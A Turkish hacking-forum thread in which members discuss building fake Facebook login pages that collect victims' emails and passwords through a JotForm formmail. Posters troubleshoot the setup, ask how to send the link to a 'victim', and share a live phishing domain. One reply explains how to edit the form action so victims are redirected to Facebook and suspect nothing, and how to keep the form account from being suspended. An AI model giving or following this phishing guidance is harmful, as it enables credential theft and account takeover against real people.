Formmail alma-Fake yapma(Facebook özel)

utopya-x

Üye
30 Ağu 2010
57
0
kardeş facenin id maileri falan yok yani 6 ve 7 . adımlarda sorun çıktı id lerin yerini bulamıyom facedeki idler yardım benim internet explorer

medusa21

Yeni üye
10 Kas 2010
7
0
merhaba
Öncelikle verdiğin emek ve sonrasında yaptığın yardımlar için teşekkür ediyorum.İnternette Fake hazırlama konusunda çok araştırdım,bir çok döküman buldum ama sizin hazırladığınız döküman gibisini açıkçası bulmadım ve bu siteyide sizin bu konunuz sayesinde keşfettim.Bir daha eline sağlık diyorum.Bir acemi olarak baya uğraştım ve doğal olarak diğer uğraşan arkadaşların sorunlarını yaşadım.7 ci bölüm baya zorluyor.Bilenler için çok kolay belki ama bizim gibi yeni gelişen acemiler için tam bir bilmece gibi:) kodların yerini bulmak zor.lütfen biraz daha yardım:)

medusa21

Yeni üye
10 Kas 2010
7
0
sonunda yapabildim.Bir çok kez denedim,kodları yazıcıdan çıkardım öyle çalıştım,sonuç çok iyi.Ancak kişi bizim fakeden facebookuna giriş yaparken şifre ve maili geliyor fakat facebooka giremiyor ekranda kocaman bir tşk yazısı çıkıyor.bu da kişiyi uayandırabilir.Hata nerde acaba?

medusa21

Yeni üye
10 Kas 2010
7
0
Kardeş güzel anlatmışsın ama eksik var login yaptıktan sonra facebook anasayfasına yönlendirmesi filan lazım yoksa kimse yutmaz bunu ;)

Evet Aynen öyle oluyor.Ben biraz uğrasarak yaptım.Çalışıyor.Şifre vb. hepsi tamam.Ama Login yapıldığında facebook sayfasına yönlendirmiyor.onun Yerine Tüm sayfada ingilizse, başvurunuz aınmıştır tşk ederiz diyor.buda kişinin uyanması için yeterli sanırım:D yok mu bunun çözümü acaba...

by.hackertr

Katılımcı Üye
13 Ağu 2010
455
0
yeni öğrenmeyen biri olarak fakemı eu.pn uzantıLı yapamıyorum suçmu :D
yardım edicek varmı ? yardım ederim die bağrıyosunuz hadi edin bakaLım :)

erdemhot91

Yeni üye
5 Ocak 2011
6
0
helal olsun kardesm.. cok guzel anlatmıssn.. yaptm fake'i girip bakabilrsnz.. fakat şifrenizi fln yazmamak kaydıyla.. :)) hesapdogrulama.eu.pn

temelkalin

Yeni üye
21 Ocak 2011
1
0
ustam eline koluna sağlık çok iyi olmuş ama ben biyerde yanlış yaptım galiba çünkü sayfaya şifreyi girer girmez bana mesaj geliyor ama şifre yazmıyo gelen mesajda bunun sebebi nedir acaba???

salodinho

Yeni üye
7 Ara 2007
5
0
ya beyler jotform hesabımı kapatıyor illegal şekilde kullandıgım için farklı bi form sitesi önercek varmı

meltem11

Yeni üye
21 Şub 2011
1
0
kardes iyi guzel hepsini uyguladim,peki karsi tarafa yollayacagimiz link girisini yollayorum sayfa goruntulenemiyor diyor kendi bilgisayarimdan sayfayi aciyor,ama baska yerden acmiyor sifrelerde geliyor ben girince.

yusuf661

Yeni üye
22 Şub 2011
6
0
Arkadasım tum bunları yaptık ama kurbana nasıl gonderıyoz faq for mu?lütfen biraz anlatırsanız cok sevınırım.......

25 Şub 2011
10
0
helal olsun kardesm.. cok guzel anlatmıssn.. yaptm fake'i girip bakabilrsnz.. fakat şifrenizi fln yazmamak kaydıyla.. :)) hesapdogrulama.eu.pn

E renkler,şekil şema açısından mükemmel diyebileceğim bir çalışma olmuş.Eline sağlık.Yalnız küçük bir tavsiyede bulunayım..

O kaynak kodu fake sitene yerleştirmeden önce ctrl+f yapıp ;

action="http://www.jotform.com/submit.php" olarak arat.Çıkan kısmı action="http://www.facebook.com" olarak değiştirmeni öneririm.

Neden? Herkes biliyor ki jotform ile kullanılan facebook fakelerinde e-posta ve şifre girildikten sonra "thanks" uyarılı bir sayfaya yönleniyor.Bu uyarı hedef aldığın kişiyi işkillendirebilir ve adres satırına bakıp şüphelenir.Her ihtimale karşı şifresini de değiştirirse senin mail adresine gelen şifre artık eskimiş statüsündedir ;)

O yüzden dediğim yeri değiştirirsen kurban facebook sayfasına yönlendirilecektir.Ondan dolayı herhangi bir şüphe çekmesini en aza indirebilirsin.

Ve son olarak,fakede kullandığımız formmail için jotform gerçekten kullanışlı ama aynı zamanda handikaplı bir site.Legal amaçla kullanmadığınız gerekçesiyle jotform hesabınızı askıya alıyor.Fake yapıp jotform ile ilişiğinizi kesmeyin.Nasıl ki mailinize girip acaba hedefi düşürdüm mü diye kontrol ediyorsunuz aynı şekilde jotform sitesine girip üyelik durumunuzu da kontrol edin.Yoksa siz yahu bu hedef fake yemedi/ne zaman yer diye mail beklerken jotform çoktan üyeliğinizi askıya almışsa hedef fake girip aldansa bile size mail gelmeyeceğini unutmayın.

İyi çalışmalar.

Edit: Konuyu açan "activeseen" rumuzlu üye de olabildiğince sade anlatımı ve anlatımını destekleyen resimlerle herkese yardımcı olmuş.

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.